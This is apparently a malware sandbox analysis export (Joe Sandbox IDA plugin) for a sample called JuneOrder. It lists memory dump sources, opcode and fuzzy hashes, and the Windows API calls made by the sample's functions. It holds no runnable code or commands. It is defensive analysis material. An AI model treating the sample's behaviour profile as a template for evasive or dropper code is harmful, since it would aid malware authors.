                                        • Instruction Fuzzy Hash: B571C3716205424BD724CF29FCD0A7633A2FBD9311B4BC73DDA4287296C238E962D694
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ab1992bfbf39856a5a7dba111a3cc4862fa1f22f04eab95b8f25578d2bf0e3f
                                        • Instruction ID: e7601879cae5e26ed9c4f46374459fbcb7982be31dee43e66e8e889727de3951
                                        • Opcode Fuzzy Hash: 2ab1992bfbf39856a5a7dba111a3cc4862fa1f22f04eab95b8f25578d2bf0e3f
                                        • Instruction Fuzzy Hash: 384105736147054BF728CA28C8607EB7390AFD4304F49493FD89A87382C6F9E8C68689
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6219c0534570dcc087454eb9247404a7b3db1bae580b6f203b5ef7fccfb18fab
                                        • Instruction ID: c66b0092c88908efcb1f6d3c64bb4500893f1a226118266ab98ff54ab3bb9a2b
                                        • Opcode Fuzzy Hash: 6219c0534570dcc087454eb9247404a7b3db1bae580b6f203b5ef7fccfb18fab
                                        • Instruction Fuzzy Hash: B631D7726547054BE728C928C8A57EB7390BF94344F49493FC88A87382C6F9E9C6C289
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8f177ef76dc2d83bc780de5ca5247833b6fb957e59de742fcb7e95280a36d76d
                                        • Instruction ID: 9975ed08cb8d88c562da0411d9d676463dde2a9787c448613e09b1fe69d496df
                                        • Opcode Fuzzy Hash: 8f177ef76dc2d83bc780de5ca5247833b6fb957e59de742fcb7e95280a36d76d
                                        • Instruction Fuzzy Hash: 0421C573754B054BE728896CC8953EB7390BFA4344F49493FC996873C1CAEAE9C5C284
                                        APIs
                                          • Part of subcall function 00408E58: wcslen.MSVCRT ref: 00408E64
                                          • Part of subcall function 00408E58: HeapAlloc.KERNEL32(00000000,00000000,?,00408F81,?), ref: 00408E7A
                                          • Part of subcall function 00408E58: wcscpy.MSVCRT ref: 00408E8B
                                        • GetStockObject.GDI32(00000011), ref: 00408FB2
                                        • LoadIconW.USER32 ref: 00408FE9
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00408FF9
                                        • RegisterClassExW.USER32 ref: 00409021
                                        • IsWindowEnabled.USER32(00000000), ref: 00409048
                                        • EnableWindow.USER32(00000000), ref: 00409059
                                        • GetSystemMetrics.USER32(00000001), ref: 00409091
                                        • GetSystemMetrics.USER32(00000000), ref: 0040909E
                                        • CreateWindowExW.USER32(00000000,00000000,10C80000,-00000096,?,?,?,?,?), ref: 004090BF
                                        • SetWindowLongW.USER32(00000000,000000EB,?), ref: 004090D3
                                        • CreateWindowExW.USER32(00000000,STATIC,?,5000000B,0000000A,0000000A,00000118,00000016,00000000,00000000,00000000), ref: 00409101
                                        • SendMessageW.USER32(00000000,00000030,00000001), ref: 00409119
                                        • CreateWindowExW.USER32(00000200,EDIT,00000000,00000000,0000000A,00000020,00000113,00000015,00000000,0000000A,00000000), ref: 00409157
                                        • SendMessageW.USER32(00000000,00000030,00000001), ref: 00409169
                                        • SetFocus.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409171
                                        • SendMessageW.USER32(0000000C,00000000,00000000), ref: 00409186
                                        • wcslen.MSVCRT ref: 00409189
                                        • wcslen.MSVCRT ref: 00409191
                                        • SendMessageW.USER32(000000B1,00000000,00000000), ref: 004091A3
                                        • CreateWindowExW.USER32(00000000,BUTTON,00413080,50010001,0000006E,00000043,00000050,00000019,00000000,000003E8,00000000), ref: 004091CD
                                        • SendMessageW.USER32(00000000,00000030,00000001), ref: 004091DF
                                        • CreateAcceleratorTableW.USER32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409216
                                        • SetForegroundWindow.USER32(00000000), ref: 0040921F
                                        • BringWindowToTop.USER32(00000000), ref: 00409226
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00409239
                                        • TranslateAcceleratorW.USER32(00000000,00000000,?), ref: 0040924A
                                        • TranslateMessage.USER32(?), ref: 00409259
                                        • DispatchMessageW.USER32(?), ref: 00409264
                                        • DestroyAcceleratorTable.USER32(00000000), ref: 00409278
                                        • wcslen.MSVCRT ref: 00409289
                                        • wcscpy.MSVCRT ref: 004092A1
                                        • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004092B4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: Window$Message$CreateSend$wcslen$Accelerator$HeapLoadMetricsSystemTableTranslatewcscpy$AllocBringClassCursorDestroyDispatchEnableEnabledFocusForegroundFreeIconLongObjectRegisterStock
                                        • String ID: 0$BUTTON$D0A$EDIT$STATIC
                                        • API String ID: 54849019-2968808370
                                        • Opcode ID: d18335faca37df58a642912671a5e6e9ed3b5d57d2cc689f0dbf3b56ae086657
                                        • Instruction ID: 83f6c24ff00e7acae504a8cc9f4403d446bfccf5cce4438541287e2077ea33a9
                                        • Opcode Fuzzy Hash: d18335faca37df58a642912671a5e6e9ed3b5d57d2cc689f0dbf3b56ae086657
                                        • Instruction Fuzzy Hash: 4E91A070648304BFE7219F64DC49F9B7FA9FB48B50F00893EF644A61E1CBB988448B59
                                        APIs
                                        • WriteFile.KERNEL32(?,00000000,?,?,00000000,?), ref: 00401637
                                          • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                          • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                          • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                          • Part of subcall function 004057F0: wcsncmp.MSVCRT(00000000,?,?,?,?,-0000012C,?,?,004022A6,00000000,00000002,00000000,00000000,00417024,00000001,00000000), ref: 00405853
                                          • Part of subcall function 004057F0: memmove.MSVCRT ref: 004058E1
                                          • Part of subcall function 004057F0: wcsncpy.MSVCRT ref: 004058F9
                                          • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                          • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02250000,00000000,?), ref: 0040DEF9
                                          • Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(02250000,00000000,?,?), ref: 0040DF1C
                                          • Part of subcall function 0040A6C5: wcsncpy.MSVCRT ref: 0040A6E3
                                          • Part of subcall function 0040A6C5: wcslen.MSVCRT ref: 0040A6F5
                                          • Part of subcall function 0040A6C5: CreateDirectoryW.KERNELBASE(?,00000000), ref: 0040A735
                                          • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: AllocateErrorHeapLastValuewcslenwcsncpy$CreateDirectoryFileWritememmovewcsncmp
                                        • String ID: $pA$&pA$.pA$2pA$2pA$2pA$6pA$6pA$6pA$fpA$fpA$fpA$fpA$fpA
                                        • API String ID: 1295435411-3159487945
                                        • Opcode ID: d3a3a63bc2a0b99ba5975a07e2b9f90fb8c3599d1eca8c8031e60196fdd81d10
                                        • Instruction ID: b4e4a0b709d291d116e2253cfe1eb4aef96e8d0e4325569d50da54c09323f468
                                        • Opcode Fuzzy Hash: d3a3a63bc2a0b99ba5975a07e2b9f90fb8c3599d1eca8c8031e60196fdd81d10
                                        • Instruction Fuzzy Hash: E3B134B1504300AED600BBA1DD81E7F77A9EB88308F108D3FF544B61A2CA3DDD59966D
                                        APIs
                                        • CoInitialize.OLE32(00000000), ref: 00409373
                                          • Part of subcall function 0040E3F0: TlsGetValue.KERNEL32(0000000D,\\?\,?,004096ED,00000104,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 0040E3FA
                                        • memset.MSVCRT ref: 00409381
                                        • LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040938E
                                        • GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 004093B0
                                        • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 004093BC
                                        • wcsncpy.MSVCRT ref: 004093DD
                                        • wcslen.MSVCRT ref: 004093F1
                                        • CoTaskMemFree.OLE32(?), ref: 0040947A
                                        • wcslen.MSVCRT ref: 00409481
                                        • FreeLibrary.KERNEL32(00000000,00000000), ref: 004094A0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskValuememsetwcsncpy
                                        • String ID: $0A$P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
                                        • API String ID: 4193992262-92458654
                                        • Opcode ID: 0c1c89229e1b22e48d7f066479dda1c34872fd3251ec2b755b1888499f20ca0d
                                        • Instruction ID: 23f57ca1c929181bfbc58391faabb4ebc57556df945843c0c8e437b0019b5ca4
                                        • Opcode Fuzzy Hash: 0c1c89229e1b22e48d7f066479dda1c34872fd3251ec2b755b1888499f20ca0d
                                        • Instruction Fuzzy Hash: D3416471508704AAC720EF759C49A9FBBE8EF88714F004C3FF945E3292D77899458B6A
                                        APIs
                                        • wcsncpy.MSVCRT ref: 00406405
                                          • Part of subcall function 0040E1E0: TlsGetValue.KERNEL32(0000000D,?,?,00405EC5,00001000,00001000,?,?,00001000,00402FE6,00000000,00000008,00000001,00000000,00000000,00000000), ref: 0040E1EA
                                        • _wcsdup.MSVCRT ref: 0040644E
                                        • _wcsdup.MSVCRT ref: 00406469
                                        • _wcsdup.MSVCRT ref: 0040648C
                                        • wcsncpy.MSVCRT ref: 00406578
                                        • free.MSVCRT(?), ref: 004065DC
                                        • free.MSVCRT(?), ref: 004065EF
                                        • free.MSVCRT(?), ref: 00406602
                                        • wcsncpy.MSVCRT ref: 0040662E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: _wcsdupfreewcsncpy$Value
                                        • String ID: $0A$$0A$$0A
                                        • API String ID: 1554701960-360074770
                                        • Opcode ID: a2ec9853b1f56fd283991c6130850b28c29d3bdb2ca3b3670bd4453c3ae5a324
                                        • Instruction ID: a3954b37eea6ac6c251c7ba509b6f2d99b081bbe67bc4aeebc7e0be9c04ba548
                                        • Opcode Fuzzy Hash: a2ec9853b1f56fd283991c6130850b28c29d3bdb2ca3b3670bd4453c3ae5a324
                                        • Instruction Fuzzy Hash: 30A1BD715043019BCB209F18C881A2BB7F1EF94348F49093EF88667391E77AD965CB9A
                                        APIs
                                          • Part of subcall function 0040E260: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E26C
                                          • Part of subcall function 0040E260: HeapReAlloc.KERNEL32(02250000,00000000,?,?), ref: 0040E2C7
                                        • LoadLibraryW.KERNEL32(Shell32.DLL,00000104,?,?,?,?,00000009,00403791,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0040A863
                                        • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 0040A875
                                        • wcscpy.MSVCRT ref: 0040A89B
                                        • wcscat.MSVCRT ref: 0040A8A6
                                        • wcslen.MSVCRT ref: 0040A8AC
                                        • CoTaskMemFree.OLE32(?,00000000,00000000,?,02259F70,00000000,00000000), ref: 0040A8BA
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00000009,00403791,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,004046B8,00000000), ref: 0040A8C1
                                        • wcscat.MSVCRT ref: 0040A8D9
                                        • wcslen.MSVCRT ref: 0040A8DF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: FreeLibrarywcscatwcslen$AddressAllocHeapLoadProcTaskValuewcscpy
                                        • String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
                                        • API String ID: 1740785346-287042676
                                        • Opcode ID: ace73f6e0916171b361586c2bbf184c955ba55397e49a90223a244ca9597bb20
                                        • Instruction ID: ae609db33c227b916d8c96984f24cc4820d8d1ee700964f601e6ad2a5a3ba7d8
                                        • Opcode Fuzzy Hash: ace73f6e0916171b361586c2bbf184c955ba55397e49a90223a244ca9597bb20
                                        • Instruction Fuzzy Hash: C821F871344701B6D2303B62EC4EF6F2A78DB91B90F11483BF901B51D2D6BC8A6199AF
                                        APIs
                                        • TlsAlloc.KERNEL32(?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004), ref: 00412092
                                        • InitializeCriticalSection.KERNEL32(00418688,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000), ref: 0041209E
                                        • TlsGetValue.KERNEL32(?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004), ref: 004120B4
                                        • HeapAlloc.KERNEL32(00000008,00000014,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 004120CE
                                        • EnterCriticalSection.KERNEL32(00418688,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000), ref: 004120DF
                                        • LeaveCriticalSection.KERNEL32(00418688,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 004120FB
                                        • GetCurrentProcess.KERNEL32(00000000,00100000,00000000,00000000,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000), ref: 00412114
                                        • GetCurrentThread.KERNEL32 ref: 00412117
                                        • GetCurrentProcess.KERNEL32(00000000,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 0041211E
                                        • DuplicateHandle.KERNEL32(00000000,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00412121
                                        • RegisterWaitForSingleObject.KERNEL32(0000000C,00000000,0041217A,00000000,000000FF,00000008), ref: 00412137
                                        • TlsSetValue.KERNEL32(00000000,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00412144
                                        • HeapAlloc.KERNEL32(00000000,0000000C,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00412155
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: AllocCriticalCurrentSection$HeapProcessValue$DuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
                                        • String ID:
                                        • API String ID: 298514914-0
                                        • Opcode ID: 090f9e8ec264e5d12bc44ccd603b7065f48900f7029304d299a0ea3cd3686378
                                        • Instruction ID: d80fd07e77255670f12a4e616af7295cf706cbaed93ad9a0fedfb01b657d880b
                                        • Opcode Fuzzy Hash: 090f9e8ec264e5d12bc44ccd603b7065f48900f7029304d299a0ea3cd3686378
                                        • Instruction Fuzzy Hash: 35211971644305FFDB119F64ED88B963FBAFB49311F04C43AFA09962A1CBB49850DB68
                                        APIs
                                        • GetWindowsDirectoryW.KERNEL32(00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 00403302
                                        • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040330B
                                        • GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 0040342B
                                        • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00403434
                                          • Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(02250000,00000000,?,?), ref: 0040DF1C
                                        • PathAddBackslashW.SHLWAPI(00000000,00000000,sysnative,00000000,00000000,00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040333B
                                          • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                          • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                          • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                          • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                          • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02250000,00000000,?), ref: 0040DEF9
                                        • GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 00403468
                                        • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 00403471
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: BackslashPath$Directory$AllocateErrorHeapLastSystemValue$Windows
                                        • String ID: sysnative
                                        • API String ID: 3406704365-821172135
                                        • Opcode ID: e5455a9928b97281f132b1c2dd1bbabf065e779dbb70284d860f41b952fb8df8
                                        • Instruction ID: 2364f58bb10a159e0aa11294c57d56a9f179ba7a21fd77f55822fae8b4f54734
                                        • Opcode Fuzzy Hash: e5455a9928b97281f132b1c2dd1bbabf065e779dbb70284d860f41b952fb8df8
                                        • Instruction Fuzzy Hash: F5514075518701AAD600BBB2CC82B2F76A9AFD0709F10CC3FF544790D2CA7CD8599A6E
                                        APIs
                                        • LoadLibraryW.KERNEL32(Kernel32.dll,00000000,00000000,00000000,00000004,00000000,0040D855,0041861C,0040D9E2,00000000,FFFFFFED,00000200,77435E70,00409E76,FFFFFFED,00000010), ref: 0040DA51
                                        • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0040DA66
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DA81
                                        • InterlockedCompareExchange.KERNEL32(00000000,00000001,00000000), ref: 0040DA90
                                        • Sleep.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DAA2
                                        • InterlockedExchange.KERNEL32(00000000,00000002), ref: 0040DAB5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: ExchangeInterlockedLibrary$AddressCompareFreeLoadProcSleep
                                        • String ID: InitOnceExecuteOnce$Kernel32.dll
                                        • API String ID: 2918862794-1339284965
                                        • Opcode ID: 04ec49063c38c3d68cea197a5330db743d42037b633bf3bb84411c831da1e2b1
                                        • Instruction ID: e7d3430369b103de8e34323ddaa6381870798cc52ac97d2691a1b23ef8b22f52
                                        • Opcode Fuzzy Hash: 04ec49063c38c3d68cea197a5330db743d42037b633bf3bb84411c831da1e2b1
                                        • Instruction Fuzzy Hash: A701B132748204BAD7116FE49C49FEB3B29EF42762F10813AF905A11C0DB7C49458A6D
                                        APIs
                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00409511
                                        • GetCurrentThreadId.KERNEL32 ref: 0040951F
                                        • IsWindowVisible.USER32(?), ref: 00409526
                                          • Part of subcall function 0040DB72: HeapAlloc.KERNEL32(00000008,00000000,0040D3EC,00418610,00000014,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040DB7E
                                        • GetCurrentThreadId.KERNEL32 ref: 00409543
                                        • GetWindowLongW.USER32(?,000000EC), ref: 00409550
                                        • GetForegroundWindow.USER32 ref: 0040955E
                                        • IsWindowEnabled.USER32(?), ref: 00409569
                                        • EnableWindow.USER32(?,00000000), ref: 00409579
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: Window$Thread$Current$AllocEnableEnabledForegroundHeapLongProcessVisible
                                        • String ID:
                                        • API String ID: 3383493704-0
                                        • Opcode ID: 761db0cbe0c8efe4181c57131f09a45cb1cea28f7de62a6f083fb5992236dbff
                                        • Instruction ID: 9be2ebae674c1fa36b8fc713cd4e728ef3198b0ad07c7790c0b3041e5f2a4f9d
                                        • Opcode Fuzzy Hash: 761db0cbe0c8efe4181c57131f09a45cb1cea28f7de62a6f083fb5992236dbff
                                        • Instruction Fuzzy Hash: A901B9315083016FD3215B769C88AABBAB8AF55750B04C03EF456D3191D7749C40C66D
                                        APIs
                                        • DestroyWindow.USER32(?), ref: 00408EED
                                        • GetWindowLongW.USER32(?,000000EB), ref: 00408EFC
                                        • GetWindowTextLengthW.USER32 ref: 00408F0A
                                        • HeapAlloc.KERNEL32(00000000), ref: 00408F1F
